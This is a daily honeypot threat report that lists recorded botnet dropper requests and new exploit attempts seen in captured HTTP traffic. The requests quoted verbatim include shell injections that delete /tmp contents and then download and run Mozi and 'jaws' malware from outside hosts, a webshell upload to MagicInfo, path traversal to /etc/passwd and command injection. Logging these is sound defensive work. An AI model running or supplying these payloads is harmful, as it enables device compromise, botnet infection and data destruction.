Daily Report: 2025-07-17#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 12 stage 1 IP address(es), linked to 4 dropper URL(s).
There are 26 new requests that have never been observed before (these were added to the monitored request database.).
A total of 1004 requests were recorded during the day, originating from 12 different countries, with a peak of 216 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
SG | Germany |
DE | Germany |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
45.135.194.11 | GET /shell?%28wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.jaws.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F38.59.219.27%2Frondo.jaws.sh%7C%7Ccurl%20http%3A%2F%2F38.59.219.27%2Frondo.jaws.sh%29%7Csh%3B HTTP/1.1 |
117.72.211.135 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
125.71.237.92 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
221.204.61.170 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
180.244.112.233 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://180.244.112.233:58214/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
8.219.236.45 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.211.199.38 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.222.196.142 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
8.219.136.190 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
120.39.222.178 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
183.252.52.229 | GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1 |
59.89.7.202 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
89 | 2 | \x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xCE\x9A\xF7\x7F\x00\x00\x00\xF5\xCAj\x83\x00\x00\x00\xE0\x81\xF3\x9A\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 |
147 | 2 | GET /articles/ HTTP/1.1 |
149 | 2 | PATCH /mgmt/tm/auth/user/ndEGX HTTP/1.1 |
166 | 1 | GET /vpn-forbidden%22;%20%7D%20else%20%7B%20window.location.href%20=%20 HTTP/1.1 |
167 | 1 | GET /ppp_user_X116.asp HTTP/1.1 |
217 | 1 | POST /MagicInfo/servlet/SWUpdateFileUploader?fileName=./../../../../../../server/R0jdE9.jsp&deviceType=abc&deviceModelName=test&swVer=123 HTTP/1.1 |
218 | 1 | GET /MagicInfo/R0jdE9.jsp?input=Mnp6dlBCc3AwMVZaaWwxU1J6M21ES0lrN0N6 HTTP/1.1 |
239 | 1 | GET /../../../../../etc/passwd%00 HTTP/1.1 |
262 | 1 | \x00\x0E\x08\x93L#\xC1\xDC\x95G\x97\x00\x00\x00\x00\x00 |
263 | 1 | \x00\x0E8\x93L#\xC1\xDC\x95G\x97\x00\x00\x00\x00\x00 |
267 | 1 | GET /bZ5E9rPDSh.php HTTP/1.1 |
283 | 1 | POST /goform/set_hidessid_cfg HTTP/1.1 |
285 | 1 | POST /loginok.html HTTP/1.1 |
286 | 1 | GET /webui/ HTTP/1.1 |
287 | 1 | GET /dir.html HTTP/1.1 |
288 | 1 | POST /services/messagebroker/streamingamf HTTP/1.1 |
291 | 1 | POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1 |
292 | 1 | POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1 |
303 | 1 | POST /p/u/doAuthentication.do HTTP/1.0 |
304 | 1 | GET /docs/1.0/?{{phpinfo()}} HTTP/1.1 |
305 | 1 | POST /php/dal.php HTTP/1.1 |
307 | 1 | GET /locales/locale.json?locale=..%2F..%2Fconfig&namespace=app HTTP/1.1 |
314 | 1 | GET /webui/application/get_saml_request?saml_id=1%26$(id |
324 | 1 | GET /xxxxx HTTP/1.1 |
344 | 1 | \x00\x0E\x08\xD5\x9Ff\xDC&\xF2?\xB8\x00\x00\x00\x00\x00 |
345 | 1 | \x00\x0E8\xD5\x9Ff\xDC&\xF2?\xB8\x00\x00\x00\x00\x00 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 216 | US |
1 | 141 | GB |
2 | 84 | PL |
3 | 81 | NL |
4 | 61 | IR |
5 | 54 | HK |
6 | 47 | CH |
7 | 45 | SO |
8 | 37 | MC |
9 | 34 | BG |
10 | 33 | CA |
11 | 25 | VN |
12 | 21 | DE |
13 | 13 | CN |
14 | 11 | SA |
15 | 10 | RU |
16 | 8 | SG |
17 | 8 | TR |
18 | 6 | UA |
19 | 6 | IL |
20 | 5 | ZA |
21 | 5 | BE |
22 | 5 | PT |
23 | 5 | MU |
24 | 4 | FR |
25 | 4 | AU |
26 | 3 | JP |
27 | 3 | IN |
28 | 3 | MA |
29 | 3 | KZ |
30 | 3 | SC |
31 | 2 | BR |
32 | 2 | ID |
33 | 2 | AM |
34 | 2 | MD |
35 | 2 | ES |
36 | 2 | KR |
37 | 2 | IE |
38 | 1 | PA |
39 | 1 | GE |
40 | 1 | SY |
41 | 1 | TW |
42 | 1 | AR |
43 | 1 | RO |